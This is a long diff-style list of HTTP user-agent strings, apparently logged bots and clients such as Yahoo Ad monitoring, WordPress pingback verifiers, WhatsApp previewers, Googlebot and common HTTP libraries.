+Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630279165-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630199796-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630207899-0 +WhatsApp/2.21.18.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630245268-0 +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 28) +Protopage/3.0 (http://www.protopage.com) +newspaper/0.3.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630226847-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630226845-0 +PostmanRuntime/7.28.4 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4626.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.8; https://www.tecmaza.com +node-fetch/2.0 (+https://github.com/bitinn/node-fetch) +PHP/6.3.07 +PHP/6.3.54 +WordPress/5.5.3; https://janiceblackmonevents.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630337075-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630284186-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630292703-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630294424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630300610-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 PTST/210827.130810 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630335991-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630335991-60 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630354759-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630335992-10 +WordPress/5.8; https://www.tecplac.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630356429-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630356430-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630356430-10 +Google/Pixel 2 (Linux;Android 11) +GoogleAuth/1.4 (heroqltevzw R16NW); gzip,gzip(gfe),gzip(gfe) +User-Agent Java/1.8.0_152 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630426857-0 +MetaInspector/5.11.2 (+https://github.com/jaimeiniesta/metainspector) +WordPress/5.5.5; http://www.primarypainting.co.nz; verifying pingback from 172.68.24.249 +WordPress/5.8; http://32w.a4f.myftpupload.com; verifying pingback from 62.80.191.122 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630369198-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630375652-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630375773-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1630405845-10 +WhatsApp/2.21.17.24 A +WhatsApp/2.21.170.17 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630440058-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630371147-0 +WhatsApp/2.21.17.23 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630377164-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630377449-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630392836-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630400346-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1630408322-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630415289-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630422517-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630425706-0 +WhatsApp/2.21.18.7 A +Microsoft-WebDAV-MiniRedir/10.0.22000 +RadiosNet/2.3.3 (Java; Android) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Mobile Safari/537.36 PTST/210831.182409 +WhatsApp/2.2134.9 N +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 PTST/210831.182409 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630512914-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630512915-10 +PHP/6.3.49 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630456143-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630463562-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630465801-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630497679-10 +WhatsApp/2.21.18.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630458698-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630465383-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630493681-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630511657-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630513402-0 +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) answer42 https://deepcrawl.com/bot +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 PTST/210831.182409 +Apache-HttpClient/UNAVAILABLE (Java/1.7.0_51) +WordPress/5.8; https://www.tecdud.com +WordPress/5.2.9; http://localhost/ndv +WordPress/5.2.11; http://localhost/ndv +GoogleAuth/1.4 (taimen RP1A.201005.004.A1); gzip,gzip(gfe),gzip(gfe) +Google Update/1.3.99.0;winhttp +Google Update/1.3.99.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 PTST/210902.152207 +Iframely/1.5.0 (+http://yourdomain.com) +WhatsApp/2.2134.10 N +WordPress/5.7.2; https://www.knowledgeprime.com; verifying pingback from 5.2.193.26 +PHP/5.3.10 +PHP/6.2.22 +WordPress.com; https://tomkurz.com; verifying pingback from 209.127.106.192 +WordPress/5.8; https://newmoongirls.com; verifying pingback from 209.127.106.155 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630542276-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630549893-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630588507-10 +WhatsApp/2.21.18.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630596381-10 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630606550-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630606581-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630544180-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630551936-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630578928-0 +WordPress/5.7.2; https://blondeambitionguiding.com +WordPress/5.8; https://exotips.com +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 30) +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 25) +WordPress/5.8; https://profitmonitoring.ru +GuzzleHttp/6.5.5 curl/7.70.0 PHP/7.4.22 +WordPress/5.8; https://www.kanaktec.com +WordPress/5.8; https://www.tecupdate.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Mobile Safari/537.36 PTST/210902.152207 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630698061-0 +Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.) +PHP/5.2.40 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630629245-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630637041-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-09@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630702658-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630631159-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630639895-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630645912-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630645954-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630649962-0 +WhatsApp/2.21.17.20 A +WhatsApp/2.21.18.11 A +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630629299-0 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64 +WordPress/5.8; https://flushingblog.com; verifying pingback from 190.184.144.154 +WordPress/5.1.10; http://www.downloadpcapps.com; verifying pingback from 181.13.198.90 +PHP/7.2.20 +PHP/5.3.01 +PHP/7.2.86 +WordPress/5.8; https://www.strategichrus.com; verifying pingback from 191.102.174.171 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630715204-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630724177-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630718430-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630726382-0 +WordPress/5.8; https://howpedia.net +WordPress/5.8; http://howpedia.net +WhatsApp/2.21.17.25 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630752816-0 +WordPress/5.8; https://tingzing.net +Apache-HttpClient/UNAVAILABLE (java 1.5) +Googlechrom/5 +Apache-HttpClient/4.5.10 (Java/16.0.1) +Java/1.5.0_14 +PHP/7.2.71 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630801087-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630807001-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630813246-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630802629-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630809074-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630817636-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630817527-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Nutscrape/1.0 (CP/M; 8-bit) +WordPress.com; http://nhattruong.blog +Apache-HttpClient/4.5.12 (Java/1.8.0_262) +curl/7.55.0 +PHP/6.2.04 +WordPress/5.7.2; https://oracionalavirgendeguadalupe.com; verifying pingback from 188.72.5.198 +WordPress/4.9.18; https://pctthailands-resellerspanel.com; verifying pingback from 31.41.84.106 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1630904522-20 +WordPress/5.5-alpha-47430; https://blogs.law.widener.edu/envirolawcenter; verifying pingback from 209.127.104.231 +WordPress/5.8; https://www.azbackroads.com; verifying pingback from 45.72.18.143 +WordPress/5.8; https://masofertas.empleoparacolombianos.com; verifying pingback from 45.72.18.253 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630887899-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630894587-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630920784-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630929426-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630944588-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630946333-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630958376-10 +WordPress/5.8; https://toptekusa.com +WordPress/5.8; https://onlinemallonline.com +WordPress/5.8; https://theshopining.com +WordPress/5.8; https://consultantify.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630889348-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630896723-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630909326-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630923070-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630931017-0 +WordPress/5.8; https://fitinness.com +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1630958915-0 +WordPress/5.8; https://arnelio.com +PHP/7.3.18 +PHP/7.2.05 +PHP/7.2.28 +PHP/6.3.74 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630974076-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630980994-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630975453-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1630982534-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1630990049-0 +WordPress/5.8; https://inlogn.nl +WordPress/5.7.2; https://webdeyazilim.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631006800-0 +WordPress.com; https://taneliperala.wordpress.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631074636-0 +WordPress/5.8; https://www.tutorialguruji.com +WordPress/5.8; https://news.cvelyser.com +WhatsApp/2.21.19.1 A +WordPress/4.9.17; http://designsandstyles.com +Apache-HttpClient/4.5.2 (Java/1.8.0_292) +WordPress/4.5.24; http://fitwithus.com/blog; verifying pingback from 186.179.47.60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631060121-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631060140-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631064300-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631079610-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631087254-10 +PycURL/7.44.1 libcurl/7.64.0 OpenSSL/1.1.1d zlib/1.2.11 libidn2/2.0.5 libpsl/0.20.2 (+libidn2/2.0.5) libssh2/1.8.0 nghttp2/1.36.0 librtmp/2.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631081569-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631087922-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631090204-0 +W3C_I18n-Checker/1.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.78 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.19.2 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.9.856 (SpeedMode; Proxy; Android 11; V2043_21 ) U2/1.0.0 Mobile +PHP/7.2.41 +WordPress/5.5.6; https://galaktyczny.pl +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631147476-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631148583-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631148600-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631155778-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631175459-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Mobile Safari/537.36 PTST/210909.135341 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631150494-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1631157275-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1631157433-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 